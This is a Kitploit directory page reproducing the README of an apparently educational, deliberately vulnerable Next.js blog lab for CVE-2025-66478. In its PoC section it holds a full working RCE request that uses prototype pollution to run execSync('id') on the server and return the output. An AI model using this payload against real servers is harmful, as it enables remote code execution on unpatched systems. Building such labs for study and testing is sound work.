Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-66478_rce_vulnerable — IMPORTANTE: Proyecto de Next JS VULNERABLE creado solo para fines educativos, de pruebas y explotación, NO SE RECOMIENDA INSTALACIÓN EN PRODUCCION, SÓLO PARA ÁMBITO LOCAL O ENTORNO CONTROLADO | Kitploit
Tools/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

IMPORTANTE: Proyecto de Next JS VULNERABLE creado solo para fines educativos, de pruebas y explotación, NO SE RECOMIENDA INSTALACIÓN EN PRODUCCION, SÓLO PARA ÁMBITO LOCAL O ENTORNO CONTROLADO

View RepositoryWebsite
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Modern Blog with shadcn/ui

A modern and elegant blog built with Next.js 16, React 19, shadcn/ui and Tailwind CSS.

IMPORTANT:

Next JS VULNERABLE project created solely for educational, testing and exploitation purposes, NOT RECOMMENDED FOR PRODUCTION DEPLOYMENT, ONLY FOR LOCAL OR CONTROLLED ENVIRONMENT

PoC

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Reference: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

Features

  • 🎨 Modern Design: Elegant interface built with shadcn/ui
  • 📝 Full Blog: Multiple blog articles with mock content
  • 💬 Reaction System: React to posts with different emotions (like, love, laugh, wow, sad, angry)
  • 👤 Authentication: Registration and login system using localStorage
  • 🎯 Responsive: Fully responsive design
  • 🌙 Dark Mode: Automatic dark mode support

Technologies

  • Next.js 16 - React Framework
  • React 19 - UI Library
  • shadcn/ui - Modern UI Components
  • Tailwind CSS 4 - Utility-first styling
  • TypeScript - Static typing
  • Lucide React - Icons
  • Radix UI - Accessible components

Installation

  1. Install the dependencies:
root@kitploit:~
npm install
# o
yarn install
# o
pnpm install
  1. Run the development server:
root@kitploit:~
npm run dev
# o
yarn dev
# o
pnpm dev
  1. Open http://localhost:3000 in your browser.

Project Structure

root@kitploit:~
├── app/                    # Páginas de Next.js
│   ├── blog/[id]/         # Página de detalle del blog
│   ├── profile/            # Página de perfil
│   ├── layout.tsx          # Layout principal
│   └── page.tsx            # Página principal
├── components/             # Componentes React
│   ├── auth/              # Componentes de autenticación
│   ├── blog/              # Componentes del blog
│   ├── layout/             # Componentes de layout
│   └── ui/                 # Componentes shadcn/ui
├── lib/                    # Utilidades y servicios
│   ├── auth.ts            # Servicio de autenticación
│   ├── mocks.ts           # Datos mock
│   └── utils.ts           # Utilidades generales
└── public/                 # Archivos estáticos

Functionalities

Authentication

  • Register new users
  • Login
  • Storage in localStorage
  • User profile

Blog

  • List of articles on the main page
  • Detail page for each article
  • Author information
  • Categories and tags
  • Cover images

Reactions

  • View all reactions of a post
  • React with different emotions
  • Reaction counter by type
  • List of users who reacted

Mock Data

All data (blogs, users, reactions) are completely mock and generated dynamically. No database required.

Notes

  • User credentials are stored in localStorage
  • Data is regenerated on every page reload
  • The reaction system is visual only (does not persist new reactions)

License

This project is for educational purposes only.

Download Tool